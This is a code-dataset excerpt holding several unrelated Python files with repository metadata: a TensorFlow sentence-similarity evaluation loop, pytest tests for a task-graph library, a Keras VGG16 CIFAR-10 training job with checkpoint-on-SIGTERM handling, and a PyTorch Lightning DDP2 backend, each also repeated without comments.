tf.flags.DEFINE_string("eval_filepath", "data/test3.tsv", "Evaluate on this data (Default: None)")
tf.flags.DEFINE_string("vocab_filepath", run_id + "/checkpoints/vocab", "Load training time vocabulary (Default: None)")
tf.flags.DEFINE_string("model", model_file, "Load trained model checkpoint (Default: None)")
tf.flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
tf.flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
FLAGS = tf.flags.FLAGS
FLAGS._parse_flags()
print("\nParameters:")
for attr, value in sorted(FLAGS.__flags.items()):
print("{}={}".format(attr.upper(), value))
if FLAGS.eval_filepath == None or FLAGS.vocab_filepath == None or FLAGS.model == None:
print("Eval or Vocab filepaths are empty.")
exit()
print("\nRunning iterative evaluation...\n")
checkpoint_file = FLAGS.model
print(checkpoint_file)
graph = tf.Graph()
with graph.as_default():
sess = tf.Session()
with sess.as_default():
saver = tf.train.import_meta_graph("{}.meta".format(checkpoint_file))
init = tf.global_variables_initializer()
sess.run(init)
saver.restore(sess, checkpoint_file)
inpH = InputHelper()
vocab_processor = inpH.restore_vocabulary_processor(FLAGS.vocab_filepath)
input_x1 = graph.get_operation_by_name("input_x1").outputs[0]
input_x1_lens = graph.get_operation_by_name("input_x1_lens").outputs[0]
input_x2 = graph.get_operation_by_name("input_x2").outputs[0]
input_x2_lens = graph.get_operation_by_name("input_x2_lens").outputs[0]
input_y = graph.get_operation_by_name("input_y").outputs[0]
dropout_keep_prob = graph.get_operation_by_name("dropout_keep_prob").outputs[0]
predictions = graph.get_operation_by_name("output/Softmax").outputs[0]
def get_lengths(x_batch):
def compute_size(x):
last_index = None
for i, e in enumerate(x):
if e is not 0:
last_index = i
return len(x) if last_index is None else last_index + 1
return [compute_size(x) for x in x_batch]
def get_feed_dict(x1_dev_b, x2_dev_b, y_dev_b):
return {
input_x1: x1_dev_b,
input_x1_lens: get_lengths(x1_dev_b),
input_x2: x2_dev_b,
input_x2_lens: get_lengths(x2_dev_b),
input_y: y_dev_b,
dropout_keep_prob: 1.0
}
while True:
s1 = input("S1 >")
s2 = input("S2 >")
x1_test = np.asarray(list(vocab_processor.transform(np.asarray([s1]))))
x2_test = np.asarray(list(vocab_processor.transform(np.asarray([s2]))))
y_test = np.asarray([0.0, 1.0])
x1_test = np.tile(x1_test, (64, 1))
x2_test = np.tile(x2_test, (64, 1))
y_test = np.tile(y_test, (64, 1))
batch_predictions = sess.run([predictions], get_feed_dict(x1_test, x2_test, y_test))
print("Prediction:", batch_predictions[0][0][1])
| true
| true
|
1c40bb05eba11a640cfaf481908902a09ba25371
| 4,534
|
py
|
Python
|
tests/unit_tests/test_core/test_pin_node.py
|
henzh/piniverse
|
77dce494cefc9e8051bb32298a5b32e2397c1634
|
[
"MIT"
] | null | null | null |
tests/unit_tests/test_core/test_pin_node.py
|
henzh/piniverse
|
77dce494cefc9e8051bb32298a5b32e2397c1634
|
[
"MIT"
] | 1
|
2019-11-11T00:25:44.000Z
|
2019-11-11T00:25:44.000Z
|
tests/unit_tests/test_core/test_pin_node.py
|
henzh/piniverse
|
77dce494cefc9e8051bb32298a5b32e2397c1634
|
[
"MIT"
] | null | null | null |
# The MIT License (MIT)
#
# Copyright (c) 2019 Henry Zhao
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import pytest
import inspect
from piniverse.core.pin_node import PinNode, PinGraph
from piniverse.common.exceptions.pin_exception import PinException
from tests.unit_tests.test_core.my_package.my_file import foo, another_foo
def test_pin_node():
pin_node_1 = PinNode('1', '2', arguments={'args': ['3'], 'kwargs': {'4': '5'}}, function=foo)
assert '1' == pin_node_1.task
assert '2' == pin_node_1.toward
assert '3' == pin_node_1.arguments['args'][0]
assert '5' == pin_node_1.arguments['kwargs']['4']
assert foo == pin_node_1.function
argspecs_1 = pin_node_1.argspecs()
assert [] == argspecs_1['args']
assert not argspecs_1['varargs']
assert not argspecs_1['varkw']
assert not argspecs_1['defaults']
assert [] == argspecs_1['kwonlyargs']
assert not argspecs_1['kwonlydefaults']
assert '{}' == argspecs_1['annotations']
pin_node_2 = PinNode('2', '2', arguments={'args': ['3'], 'kwargs': {'4': '5'}}, function=another_foo)
assert '2' == pin_node_2.task
assert '2' == pin_node_2.toward
assert '3' == pin_node_2.arguments['args'][0]
assert '5' == pin_node_2.arguments['kwargs']['4']
assert another_foo == pin_node_2.function
argspecs = PinNode.parse(inspect.getfullargspec(foo))
assert [] == argspecs['args']
assert not argspecs['varargs']
assert not argspecs['varkw']
assert not argspecs['defaults']
assert [] == argspecs['kwonlyargs']
assert not argspecs['kwonlydefaults']
assert '{}' == argspecs['annotations']
argspecs_2 = pin_node_2.argspecs()
assert [] == argspecs_2['args']
assert not argspecs_2['varargs']
assert not argspecs_2['varkw']
assert not argspecs_2['defaults']
assert [] == argspecs_2['kwonlyargs']
assert not argspecs_2['kwonlydefaults']
assert '{}' == argspecs_2['annotations']
def test_pin_graph():
parents = {'1': '1', '2': '1', '3': '2', '4': '4', '5': '4'}
assert '1' == PinGraph.find(parents, '1')
assert '1' == PinGraph.find(parents, '2')
assert '1' == PinGraph.find(parents, '3')
assert '4' == PinGraph.find(parents, '4')
assert '4' == PinGraph.find(parents, '5')
pin_node_1 = PinNode('1', '2', arguments={'args': ['3'], 'kwargs': {'4': '5'}}, function=foo)
pin_node_2 = PinNode('2', '1', arguments={'args': ['3'], 'kwargs': {'4': '5'}}, function=another_foo)
pin_nodes = [pin_node_1, pin_node_2]
with pytest.raises(PinException) as e:
PinGraph.union(pin_nodes)
assert 'Found a cyclic dependency: 1, 2' == str(e.value) or 'Found a cyclic dependency: 2, 1' == str(e.value)
pin_node_1 = PinNode('1', '2', arguments={'args': ['3'], 'kwargs': {'4': '5'}}, function=foo)
pin_node_2 = PinNode('2', None, arguments={'args': ['3'], 'kwargs': {'4': '5'}}, function=another_foo)
pin_nodes = [pin_node_1, pin_node_2]
parents = PinGraph.union(pin_nodes)
assert '1' == parents['1']
assert '1' == parents['2']
dag = PinGraph.topological_sort(pin_nodes)
assert foo == next(
filter(lambda pin_node: pin_node.task == '1', dag)).function
assert another_foo == next(
filter(lambda pin_node: pin_node.task == '2', dag)).function
dag = PinGraph(pin_nodes).dag
assert foo == next(
filter(lambda pin_node: pin_node.task == '1', dag)).function
assert another_foo == next(
filter(lambda pin_node: pin_node.task == '2', dag)).function
| 42.373832
| 113
| 0.671592
|
import pytest
import inspect
from piniverse.core.pin_node import PinNode, PinGraph
from piniverse.common.exceptions.pin_exception import PinException
from tests.unit_tests.test_core.my_package.my_file import foo, another_foo
def test_pin_node():
pin_node_1 = PinNode('1', '2', arguments={'args': ['3'], 'kwargs': {'4': '5'}}, function=foo)
assert '1' == pin_node_1.task
assert '2' == pin_node_1.toward
assert '3' == pin_node_1.arguments['args'][0]
assert '5' == pin_node_1.arguments['kwargs']['4']
assert foo == pin_node_1.function
argspecs_1 = pin_node_1.argspecs()
assert [] == argspecs_1['args']
assert not argspecs_1['varargs']
assert not argspecs_1['varkw']
assert not argspecs_1['defaults']
assert [] == argspecs_1['kwonlyargs']
assert not argspecs_1['kwonlydefaults']
assert '{}' == argspecs_1['annotations']
pin_node_2 = PinNode('2', '2', arguments={'args': ['3'], 'kwargs': {'4': '5'}}, function=another_foo)
assert '2' == pin_node_2.task
assert '2' == pin_node_2.toward
assert '3' == pin_node_2.arguments['args'][0]
assert '5' == pin_node_2.arguments['kwargs']['4']
assert another_foo == pin_node_2.function
argspecs = PinNode.parse(inspect.getfullargspec(foo))
assert [] == argspecs['args']
assert not argspecs['varargs']
assert not argspecs['varkw']
assert not argspecs['defaults']
assert [] == argspecs['kwonlyargs']
assert not argspecs['kwonlydefaults']
assert '{}' == argspecs['annotations']
argspecs_2 = pin_node_2.argspecs()
assert [] == argspecs_2['args']
assert not argspecs_2['varargs']
assert not argspecs_2['varkw']
assert not argspecs_2['defaults']
assert [] == argspecs_2['kwonlyargs']
assert not argspecs_2['kwonlydefaults']
assert '{}' == argspecs_2['annotations']
def test_pin_graph():
parents = {'1': '1', '2': '1', '3': '2', '4': '4', '5': '4'}
assert '1' == PinGraph.find(parents, '1')
assert '1' == PinGraph.find(parents, '2')
assert '1' == PinGraph.find(parents, '3')
assert '4' == PinGraph.find(parents, '4')
assert '4' == PinGraph.find(parents, '5')
pin_node_1 = PinNode('1', '2', arguments={'args': ['3'], 'kwargs': {'4': '5'}}, function=foo)
pin_node_2 = PinNode('2', '1', arguments={'args': ['3'], 'kwargs': {'4': '5'}}, function=another_foo)
pin_nodes = [pin_node_1, pin_node_2]
with pytest.raises(PinException) as e:
PinGraph.union(pin_nodes)
assert 'Found a cyclic dependency: 1, 2' == str(e.value) or 'Found a cyclic dependency: 2, 1' == str(e.value)
pin_node_1 = PinNode('1', '2', arguments={'args': ['3'], 'kwargs': {'4': '5'}}, function=foo)
pin_node_2 = PinNode('2', None, arguments={'args': ['3'], 'kwargs': {'4': '5'}}, function=another_foo)
pin_nodes = [pin_node_1, pin_node_2]
parents = PinGraph.union(pin_nodes)
assert '1' == parents['1']
assert '1' == parents['2']
dag = PinGraph.topological_sort(pin_nodes)
assert foo == next(
filter(lambda pin_node: pin_node.task == '1', dag)).function
assert another_foo == next(
filter(lambda pin_node: pin_node.task == '2', dag)).function
dag = PinGraph(pin_nodes).dag
assert foo == next(
filter(lambda pin_node: pin_node.task == '1', dag)).function
assert another_foo == next(
filter(lambda pin_node: pin_node.task == '2', dag)).function
| true
| true
|
1c40bb46c037ce1e6e7e93b3825f8451e5627eab
| 7,024
|
py
|
Python
|
examples/pwr_run/checkpointing/nonpc_short/knn/job12.py
|
boringlee24/keras_old
|
1e1176c45c4952ba1b9b9e58e9cc4df027ab111d
|
[
"MIT"
] | null | null | null |
examples/pwr_run/checkpointing/nonpc_short/knn/job12.py
|
boringlee24/keras_old
|
1e1176c45c4952ba1b9b9e58e9cc4df027ab111d
|
[
"MIT"
] | null | null | null |
examples/pwr_run/checkpointing/nonpc_short/knn/job12.py
|
boringlee24/keras_old
|
1e1176c45c4952ba1b9b9e58e9cc4df027ab111d
|
[
"MIT"
] | null | null | null |
"""
#Trains a ResNet on the CIFAR10 dataset.
"""
from __future__ import print_function
import keras
from keras.layers import Dense, Conv2D, BatchNormalization, Activation
from keras.layers import AveragePooling2D, Input, Flatten
from keras.optimizers import Adam
from keras.callbacks import ModelCheckpoint, LearningRateScheduler
from keras.callbacks import ReduceLROnPlateau, TensorBoard
from keras.preprocessing.image import ImageDataGenerator
from keras.regularizers import l2
from keras import backend as K
from keras.models import Model
from keras.datasets import cifar10
from keras.applications.vgg16 import VGG16
from keras.applications.vgg19 import VGG19
from keras import models, layers, optimizers
from datetime import datetime
import tensorflow as tf
import numpy as np
import os
import pdb
import sys
import argparse
import time
import signal
import glob
import json
import send_signal
parser = argparse.ArgumentParser(description='Tensorflow Cifar10 Training')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='specific testcase name')
parser.add_argument('--resume', dest='resume', action='store_true', help='if True, resume training from a checkpoint')
parser.add_argument('--gpu_num', metavar='GPU_NUMBER', type=str, help='select which gpu to use')
parser.add_argument('--node', metavar='HOST_NODE', type=str, help='node of the host (scheduler)')
parser.set_defaults(resume=False)
args = parser.parse_args()
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]=args.gpu_num
# Training parameters
batch_size = 256
args_lr = 0.003
args_model = 'vgg16'
epoch_begin_time = 0
job_name = sys.argv[0].split('.')[0]
save_files = '/scratch/li.baol/checkpoint_knn/' + job_name + '*'
total_epochs = 18
starting_epoch = 0
# first step is to update the PID
pid_dict = {}
with open('pid_lock.json', 'r') as fp:
pid_dict = json.load(fp)
pid_dict[job_name] = os.getpid()
json_file = json.dumps(pid_dict)
with open('pid_lock.json', 'w') as fp:
fp.write(json_file)
os.rename('pid_lock.json', 'pid.json')
if args.resume:
save_file = glob.glob(save_files)[0]
# epochs = int(save_file.split('/')[4].split('_')[1].split('.')[0])
starting_epoch = int(save_file.split('/')[4].split('.')[0].split('_')[-1])
data_augmentation = True
num_classes = 10
# Subtracting pixel mean improves accuracy
subtract_pixel_mean = True
n = 3
# Model name, depth and version
model_type = args.tc #'P100_resnet50_he_256_1'
# Load the CIFAR10 data.
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
# Normalize data.
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
# If subtract pixel mean is enabled
if subtract_pixel_mean:
x_train_mean = np.mean(x_train, axis=0)
x_train -= x_train_mean
x_test -= x_train_mean
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
print('y_train shape:', y_train.shape)
# Convert class vectors to binary class matrices.
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
if args.resume:
print('resume from checkpoint')
model = keras.models.load_model(save_file)
else:
print('train from start')
model = models.Sequential()
if '16' in args_model:
base_model = VGG16(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
elif '19' in args_model:
base_model = VGG19(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
#base_model.summary()
#pdb.set_trace()
model.add(base_model)
model.add(layers.Flatten())
model.add(layers.BatchNormalization())
model.add(layers.Dense(128, activation='relu'))#, kernel_initializer='he_uniform'))
#model.add(layers.Dropout(0.2))
model.add(layers.BatchNormalization())
model.add(layers.Dense(64, activation='relu'))#, kernel_initializer='he_uniform'))
#model.add(layers.Dropout(0.2))
model.add(layers.BatchNormalization())
model.add(layers.Dense(10, activation='softmax'))#, kernel_initializer='he_uniform'))
model.compile(loss='categorical_crossentropy',
optimizer=Adam(lr=args_lr),
metrics=['accuracy'])
#model.summary()
print(model_type)
#pdb.set_trace()
current_epoch = 0
################### connects interrupt signal to the process #####################
def terminateProcess(signalNumber, frame):
# first record the wasted epoch time
global epoch_begin_time
if epoch_begin_time == 0:
epoch_waste_time = 0
else:
epoch_waste_time = int(time.time() - epoch_begin_time)
epoch_waste_dict = {}
with open('epoch_waste.json', 'r') as fp:
epoch_waste_dict = json.load(fp)
epoch_waste_dict[job_name] += epoch_waste_time
json_file3 = json.dumps(epoch_waste_dict)
with open('epoch_waste.json', 'w') as fp:
fp.write(json_file3)
print('checkpointing the model triggered by kill -15 signal')
# delete whatever checkpoint that already exists
for f in glob.glob(save_files):
os.remove(f)
model.save('/scratch/li.baol/checkpoint_knn/' + job_name + '_' + str(current_epoch) + '.h5')
print ('(SIGTERM) terminating the process')
checkpoint_dict = {}
with open('checkpoint.json', 'r') as fp:
checkpoint_dict = json.load(fp)
checkpoint_dict[job_name] = 1
json_file3 = json.dumps(checkpoint_dict)
with open('checkpoint.json', 'w') as fp:
fp.write(json_file3)
sys.exit()
signal.signal(signal.SIGTERM, terminateProcess)
#################################################################################
logdir = '/scratch/li.baol/tsrbrd_log/job_runs/' + model_type + '/' + job_name
tensorboard_callback = TensorBoard(log_dir=logdir)#, update_freq='batch')
class PrintEpoch(keras.callbacks.Callback):
def on_epoch_begin(self, epoch, logs=None):
global current_epoch
#remaining_epochs = epochs - epoch
current_epoch = epoch
print('current epoch ' + str(current_epoch))
global epoch_begin_time
epoch_begin_time = time.time()
my_callback = PrintEpoch()
callbacks = [tensorboard_callback, my_callback]
#[checkpoint, lr_reducer, lr_scheduler, tensorboard_callback]
# Run training
# send signal to indicate checkpoint is qualified
message = job_name + ' ckpt_qual'
send_signal.send(args.node, 10002, message)
model.fit(x_train, y_train,
batch_size=batch_size,
epochs=round(total_epochs/2),
validation_data=(x_test, y_test),
shuffle=True,
callbacks=callbacks,
initial_epoch=starting_epoch,
verbose=1
)
# Score trained model.
scores = model.evaluate(x_test, y_test, verbose=1)
print('Test loss:', scores[0])
print('Test accuracy:', scores[1])
# send signal to indicate job has finished
message = job_name + ' finish'
send_signal.send(args.node, 10002, message)
| 31.217778
| 118
| 0.703303
|
from __future__ import print_function
import keras
from keras.layers import Dense, Conv2D, BatchNormalization, Activation
from keras.layers import AveragePooling2D, Input, Flatten
from keras.optimizers import Adam
from keras.callbacks import ModelCheckpoint, LearningRateScheduler
from keras.callbacks import ReduceLROnPlateau, TensorBoard
from keras.preprocessing.image import ImageDataGenerator
from keras.regularizers import l2
from keras import backend as K
from keras.models import Model
from keras.datasets import cifar10
from keras.applications.vgg16 import VGG16
from keras.applications.vgg19 import VGG19
from keras import models, layers, optimizers
from datetime import datetime
import tensorflow as tf
import numpy as np
import os
import pdb
import sys
import argparse
import time
import signal
import glob
import json
import send_signal
parser = argparse.ArgumentParser(description='Tensorflow Cifar10 Training')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='specific testcase name')
parser.add_argument('--resume', dest='resume', action='store_true', help='if True, resume training from a checkpoint')
parser.add_argument('--gpu_num', metavar='GPU_NUMBER', type=str, help='select which gpu to use')
parser.add_argument('--node', metavar='HOST_NODE', type=str, help='node of the host (scheduler)')
parser.set_defaults(resume=False)
args = parser.parse_args()
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]=args.gpu_num
batch_size = 256
args_lr = 0.003
args_model = 'vgg16'
epoch_begin_time = 0
job_name = sys.argv[0].split('.')[0]
save_files = '/scratch/li.baol/checkpoint_knn/' + job_name + '*'
total_epochs = 18
starting_epoch = 0
pid_dict = {}
with open('pid_lock.json', 'r') as fp:
pid_dict = json.load(fp)
pid_dict[job_name] = os.getpid()
json_file = json.dumps(pid_dict)
with open('pid_lock.json', 'w') as fp:
fp.write(json_file)
os.rename('pid_lock.json', 'pid.json')
if args.resume:
save_file = glob.glob(save_files)[0]
starting_epoch = int(save_file.split('/')[4].split('.')[0].split('_')[-1])
data_augmentation = True
num_classes = 10
subtract_pixel_mean = True
n = 3
model_type = args.tc
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
if subtract_pixel_mean:
x_train_mean = np.mean(x_train, axis=0)
x_train -= x_train_mean
x_test -= x_train_mean
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
print('y_train shape:', y_train.shape)
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
if args.resume:
print('resume from checkpoint')
model = keras.models.load_model(save_file)
else:
print('train from start')
model = models.Sequential()
if '16' in args_model:
base_model = VGG16(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
elif '19' in args_model:
base_model = VGG19(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
model.add(base_model)
model.add(layers.Flatten())
model.add(layers.BatchNormalization())
model.add(layers.Dense(128, activation='relu'))
model.add(layers.BatchNormalization())
model.add(layers.Dense(64, activation='relu'))
model.add(layers.BatchNormalization())
model.add(layers.Dense(10, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=Adam(lr=args_lr),
metrics=['accuracy'])
print(model_type)
current_epoch = 0
| true
| true
|
1c40bbef9d0c743ca08be761b688558d1d2052cb
| 294
|
py
|
Python
|
zadanie5.py
|
djdanto/Python100
|
524188233a966b12cf6bdfb9c14cf6bf25bf5205
|
[
"MIT"
] | null | null | null |
zadanie5.py
|
djdanto/Python100
|
524188233a966b12cf6bdfb9c14cf6bf25bf5205
|
[
"MIT"
] | null | null | null |
zadanie5.py
|
djdanto/Python100
|
524188233a966b12cf6bdfb9c14cf6bf25bf5205
|
[
"MIT"
] | null | null | null |
celsiusz = float(input('Wprowadz temeperature w stopniach celsiusza: '))
fahrenheit = (celsiusz * 1.8) + 32
print('%0.1f Celsiusz = %0.1f Fahrenheit'%(celsiusz,fahrenheit))
kw = float(input('Wprowadz ilość koni mechanicznych: '))
kM = (kw * 1,36)
print(' kw = kM'%(kw,kM))
| 26.727273
| 74
| 0.639456
|
celsiusz = float(input('Wprowadz temeperature w stopniach celsiusza: '))
fahrenheit = (celsiusz * 1.8) + 32
print('%0.1f Celsiusz = %0.1f Fahrenheit'%(celsiusz,fahrenheit))
kw = float(input('Wprowadz ilość koni mechanicznych: '))
kM = (kw * 1,36)
print(' kw = kM'%(kw,kM))
| true
| true
|
1c40bcbda0e67afd5b32077d733c0afca144bac1
| 6,871
|
py
|
Python
|
pytorch_lightning/accelerators/ddp2_backend.py
|
willprice/pytorch-lightning
|
94bba4059ce3dc13799d0fd59592f3bcfbbf19c4
|
[
"Apache-2.0"
] | null | null | null |
pytorch_lightning/accelerators/ddp2_backend.py
|
willprice/pytorch-lightning
|
94bba4059ce3dc13799d0fd59592f3bcfbbf19c4
|
[
"Apache-2.0"
] | null | null | null |
pytorch_lightning/accelerators/ddp2_backend.py
|
willprice/pytorch-lightning
|
94bba4059ce3dc13799d0fd59592f3bcfbbf19c4
|
[
"Apache-2.0"
] | null | null | null |
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
import os
import torch
from pytorch_lightning import _logger as log
from pytorch_lightning.utilities import AMPType
from pytorch_lightning.utilities.distributed import rank_zero_only
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.core.step_result import Result
from pytorch_lightning.accelerators.base_backend import Accelerator
try:
from hydra.utils import to_absolute_path, get_original_cwd
from hydra.core.hydra_config import HydraConfig
except ImportError:
HYDRA_AVAILABLE = False
else:
HYDRA_AVAILABLE = True
try:
from apex import amp
except ImportError:
amp = None
class DDP2Backend(Accelerator):
def __init__(self, trainer):
super().__init__(trainer)
self.task_idx = None
def setup(self, model):
self._resolve_task_idx()
self.trainer.model = model
def _resolve_task_idx(self):
if self.trainer.is_slurm_managing_tasks:
self.task_idx = int(os.environ['SLURM_LOCALID'])
else:
# torchelastic or general non_slurm ddp2
try:
self.task_idx = int(os.environ['LOCAL_RANK'])
except Exception as e:
m = 'ddp2 only works in SLURM or via torchelastic with the WORLD_SIZE, LOCAL_RANK, GROUP_RANK flags'
raise MisconfigurationException(m)
def train(self):
model = self.trainer.model
self.ddp_train(process_idx=self.task_idx, mp_queue=None, model=model)
def ddp_train(self, process_idx, mp_queue, model, is_master=False, proc_offset=0):
"""
Entry point for ddp
Args:
process_idx:
mp_queue: multiprocessing queue
model:
is_master:
proc_offset:
Returns:
"""
# offset the process id if requested
process_idx = process_idx + proc_offset
# show progressbar only on progress_rank 0
if (self.trainer.node_rank != 0 or process_idx != 0) and self.trainer.progress_bar_callback is not None:
self.trainer.progress_bar_callback.disable()
self.trainer.local_rank = self.trainer.node_rank
self.trainer.global_rank = self.trainer.node_rank
self.trainer.world_size = self.trainer.num_nodes
# set warning rank
rank_zero_only.rank = self.trainer.global_rank
# set up server using proc 0's ip address
# try to init for 20 times at max in case ports are taken
# where to store ip_table
model.trainer = self.trainer
model.init_ddp_connection(
self.trainer.global_rank,
self.trainer.world_size,
self.trainer.is_slurm_managing_tasks
)
# call setup after the ddp process has connected
self.trainer.call_setup_hook(model)
# on world_size=0 let everyone know training is starting
if self.trainer.is_global_zero:
log.info('-' * 100)
log.info(f'distributed_backend={self.trainer.distributed_backend}')
log.info(f'All DDP processes registered. Starting ddp with {self.trainer.world_size} processes')
log.info('-' * 100)
# MODEL
# copy model to each gpu
if self.trainer.on_gpu:
gpu_idx = process_idx
# when using ddp, the master process (proc 0) continues running as the main one
# this means that the local rank will always be 0
# (even if cuda visible devices has other visible gpus)
# this means that the master process needs to pull the 0th visible index as the device number
if is_master:
available_gpus = os.environ['CUDA_VISIBLE_DEVICES'].split(',')
gpu_idx = int(available_gpus[self.trainer.local_rank])
self.trainer.root_gpu = gpu_idx
torch.cuda.set_device(self.trainer.root_gpu)
model.cuda(self.trainer.root_gpu)
# CHOOSE OPTIMIZER
# allow for lr schedulers as well
optimizers, lr_schedulers, optimizer_frequencies = self.trainer.init_optimizers(model)
self.trainer.optimizers = optimizers
self.trainer.lr_schedulers = lr_schedulers
self.trainer.optimizer_frequencies = optimizer_frequencies
# set model properties before going into wrapper
self.trainer.copy_trainer_model_properties(model)
# AMP - run through amp wrapper before going to distributed DP
if self.trainer.amp_backend == AMPType.APEX:
model, optimizers = model.configure_apex(amp, model, self.trainer.optimizers, self.trainer.amp_level)
self.trainer.optimizers = optimizers
self.trainer.reinit_scheduler_properties(self.trainer.optimizers, self.trainer.lr_schedulers)
# DDP2 uses all GPUs on the machine
device_ids = self.trainer.data_parallel_device_ids
# allow user to configure ddp
model = model.configure_ddp(model, device_ids)
# set up training routine
self.trainer.setup_training(model)
# train or test
results = self.trainer.train_or_test()
# get original model
model = self.trainer.get_model()
# persist info in ddp_spawn
self.trainer.transfer_distrib_spawn_state_on_fit_end(model, mp_queue, results)
# clean up memory
torch.cuda.empty_cache()
def training_step(self, args):
if self.trainer.amp_backend == AMPType.NATIVE:
with torch.cuda.amp.autocast():
output = self.trainer.model(*args)
else:
output = self.trainer.model(*args)
return output
def validation_step(self, args):
output = self.training_step(args)
return output
def test_step(self, args):
output = self.training_step(args)
return output
def training_step_end(self, output):
if isinstance(output, Result):
output.dp_reduce()
return output
def validation_step_end(self, output):
if isinstance(output, Result):
output.dp_reduce()
return output
def test_step_end(self, output):
if isinstance(output, Result):
output.dp_reduce()
return output
| 34.70202
| 116
| 0.666715
|
import os
import torch
from pytorch_lightning import _logger as log
from pytorch_lightning.utilities import AMPType
from pytorch_lightning.utilities.distributed import rank_zero_only
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.core.step_result import Result
from pytorch_lightning.accelerators.base_backend import Accelerator
try:
from hydra.utils import to_absolute_path, get_original_cwd
from hydra.core.hydra_config import HydraConfig
except ImportError:
HYDRA_AVAILABLE = False
else:
HYDRA_AVAILABLE = True
try:
from apex import amp
except ImportError:
amp = None
class DDP2Backend(Accelerator):
def __init__(self, trainer):
super().__init__(trainer)
self.task_idx = None
def setup(self, model):
self._resolve_task_idx()
self.trainer.model = model
def _resolve_task_idx(self):
if self.trainer.is_slurm_managing_tasks:
self.task_idx = int(os.environ['SLURM_LOCALID'])
else:
try:
self.task_idx = int(os.environ['LOCAL_RANK'])
except Exception as e:
m = 'ddp2 only works in SLURM or via torchelastic with the WORLD_SIZE, LOCAL_RANK, GROUP_RANK flags'
raise MisconfigurationException(m)
def train(self):
model = self.trainer.model
self.ddp_train(process_idx=self.task_idx, mp_queue=None, model=model)
def ddp_train(self, process_idx, mp_queue, model, is_master=False, proc_offset=0):
process_idx = process_idx + proc_offset
if (self.trainer.node_rank != 0 or process_idx != 0) and self.trainer.progress_bar_callback is not None:
self.trainer.progress_bar_callback.disable()
self.trainer.local_rank = self.trainer.node_rank
self.trainer.global_rank = self.trainer.node_rank
self.trainer.world_size = self.trainer.num_nodes
rank_zero_only.rank = self.trainer.global_rank
# try to init for 20 times at max in case ports are taken
# where to store ip_table
model.trainer = self.trainer
model.init_ddp_connection(
self.trainer.global_rank,
self.trainer.world_size,
self.trainer.is_slurm_managing_tasks
)
# call setup after the ddp process has connected
self.trainer.call_setup_hook(model)
# on world_size=0 let everyone know training is starting
if self.trainer.is_global_zero:
log.info('-' * 100)
log.info(f'distributed_backend={self.trainer.distributed_backend}')
log.info(f'All DDP processes registered. Starting ddp with {self.trainer.world_size} processes')
log.info('-' * 100)
# MODEL
# copy model to each gpu
if self.trainer.on_gpu:
gpu_idx = process_idx
# when using ddp, the master process (proc 0) continues running as the main one
# this means that the local rank will always be 0
# (even if cuda visible devices has other visible gpus)
# this means that the master process needs to pull the 0th visible index as the device number
if is_master:
available_gpus = os.environ['CUDA_VISIBLE_DEVICES'].split(',')
gpu_idx = int(available_gpus[self.trainer.local_rank])
self.trainer.root_gpu = gpu_idx
torch.cuda.set_device(self.trainer.root_gpu)
model.cuda(self.trainer.root_gpu)
# CHOOSE OPTIMIZER
# allow for lr schedulers as well
optimizers, lr_schedulers, optimizer_frequencies = self.trainer.init_optimizers(model)
self.trainer.optimizers = optimizers
self.trainer.lr_schedulers = lr_schedulers
self.trainer.optimizer_frequencies = optimizer_frequencies
# set model properties before going into wrapper
self.trainer.copy_trainer_model_properties(model)
# AMP - run through amp wrapper before going to distributed DP
if self.trainer.amp_backend == AMPType.APEX:
model, optimizers = model.configure_apex(amp, model, self.trainer.optimizers, self.trainer.amp_level)
self.trainer.optimizers = optimizers
self.trainer.reinit_scheduler_properties(self.trainer.optimizers, self.trainer.lr_schedulers)
# DDP2 uses all GPUs on the machine
device_ids = self.trainer.data_parallel_device_ids
# allow user to configure ddp
